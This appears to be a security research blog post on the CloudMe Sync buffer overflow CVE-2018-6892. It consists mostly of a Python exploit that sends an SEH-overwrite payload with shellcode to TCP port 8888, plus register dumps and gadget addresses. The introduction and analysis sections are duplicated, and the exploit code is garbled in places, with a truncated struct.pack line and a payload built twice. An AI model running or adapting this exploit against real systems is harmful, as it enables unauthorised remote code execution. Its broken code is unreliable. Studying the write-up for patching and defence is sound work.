CloudMe Sync - Buffer Overflow Zero Day Exploit | CVE-2018-6892 | Lucideus Research
[Difficulty Level: Easy]
Introduction
CloudMe is a secure European service that makes your life a little bit easier. With CloudMe you don’t have to think twice about where your files are, they’re always with you.The service combines cloud storage with synchronisation of data, allowing you to sync your mobile camera roll with for example your tablet or TV, to sync files across computers and mobile devices, and to share and receive files with friends and colleagues. CloudMe is the number one cloud / sync storage service in Europe and is used throughout most countries in the world.
The CloudMe service is offered with a freemium business model and provides encrypted SSL connection with SSL Extended Validation Certificate. CloudMe provides client software for Microsoft Windows, macOS, Linux, Android, iOS, Google TV, Samsung Smart TV, WD TV, Windows Storage Server for NAS and web browsers.CloudMe features a Cloud storage and sync solution that allows the users to store, access and share their content, both with each other and with people outside the service. Sharing can be done by email, text messaging, Facebook and Google. Files can be stored in a blue folder, which is synchronised to all connected computers and devices. A web desktop and cloud OS service called CloudTop.com is available that uses CloudMe as its internet file system.
For checking socket listening on TCP port 8888
C:\Users\root>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 3740
TCP [::]:8888 [::]:0 LISTENING 3740
CloudMe Zero-day Exploit
It’s a python based code for exploiting the CloudMe sync with Buffer Overflow vulnerability. CloudMe Sync EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
ASLR(Address Space Layout Randomisation) SafeSEH(Structured Exception Handling) are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit.
Introduction
CloudMe is a secure European service that makes your life a little bit easier. With CloudMe you don’t have to think twice about where your files are, they’re always with you.The service combines cloud storage with synchronisation of data, allowing you to sync your mobile camera roll with for example your tablet or TV, to sync files across computers and mobile devices, and to share and receive files with friends and colleagues. CloudMe is the number one cloud / sync storage service in Europe and is used throughout most countries in the world.
The CloudMe service is offered with a freemium business model and provides encrypted SSL connection with SSL Extended Validation Certificate. CloudMe provides client software for Microsoft Windows, macOS, Linux, Android, iOS, Google TV, Samsung Smart TV, WD TV, Windows Storage Server for NAS and web browsers.CloudMe features a Cloud storage and sync solution that allows the users to store, access and share their content, both with each other and with people outside the service. Sharing can be done by email, text messaging, Facebook and Google. Files can be stored in a blue folder, which is synchronised to all connected computers and devices. A web desktop and cloud OS service called CloudTop.com is available that uses CloudMe as its internet file system.
For checking socket listening on TCP port 8888
C:\Users\root>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 3740
TCP [::]:8888 [::]:0 LISTENING 3740
CloudMe Zero-day Exploit
It’s a python based code for exploiting the CloudMe sync with Buffer Overflow vulnerability. CloudMe Sync EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
ASLR(Address Space Layout Randomisation) SafeSEH(Structured Exception Handling) are all set to false making the exploit portable and able to work across different operating systems. We will therefore use Structured Exceptional Handler overwrite for our exploit.
- 6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
- 00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
- 61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
Cloudme.py Exploit Execution Flow
import socket,struct
print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'apparition security\n'
#it’s our shellcode to pop calc.exe in Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
ip=raw_input('[+] CloudMe Target IP> ') #put ‘Target IP’ here e.g:(ip=’localhost’)
nseh="\xEB\x06"+"\x90"*2 #JMP or Call (jump to the register)
seh=struct.pack(' #Overwrite SEH with a POP,POP RET on Qt5Gui.dll
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc
def PwnMe(ip,payload): #Make a connection to target system on TCP/8888
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow packetz'
raw_input()
if __name__ == '__main__':
PwnMe(ip,payload)
POC VIDEO
Mitigation: Download the updated version of CloudMe
